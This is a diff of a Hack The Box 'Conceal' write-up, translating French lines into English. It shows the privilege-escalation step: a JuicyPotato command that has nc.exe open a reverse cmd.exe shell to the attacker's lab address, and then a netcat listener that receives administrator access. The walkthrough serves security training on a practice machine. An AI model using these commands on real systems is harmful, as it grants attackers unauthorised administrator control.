0xex75-english/0xex75-english.github.io/_posts/2019-05-18-hackthebox-conceal.md

 	OS Name:                   Microsoft Windows 10 Enterprise
 	OS Version:                10.0.15063 N/A Build 15063

-Ensuite, nous vérifions sur le site https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md la liste des CLSID pour le système d'exploitation. <br />
+Then, we check on the site https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md the list of CLSIDs for the operating system. <br />

-Nous allons utiliser {5BC7A3A1-E905-414B-9790-E511346F5CA6}, sans aucune raison particulière, puis exécuter JuicyPotato et exécuter un autre netcat pour générer un nouveau shell inversé pour nous.
+We will use {5BC7A3A1-E905-414B-9790-E511346F5CA6}, for no particular reason, then run JuicyPotato and run another netcat to generate a new reverse shell for us.

 	C:\inetpub\wwwroot\upload>juicypotato.exe -l 1234 -p nc.exe -a "-e cmd.exe 10.10.14.39 9001" -t * -c {5BC7A3A1-E905-414B-9790-E511346F5CA6}
 	[...SNIP...]
 	[+] CreateProcessWithTokenW OK

-Et ensuite on a juste à faire le reverse shell depuis notre machine physique pour être administrateur.
+And then we just have to do the reverse shell from our physical machine to be administrator.

 	root@Seyptoo:~/htb/box/Conceal# nc -lvnp 9001
 	listening on [any] 9001 ...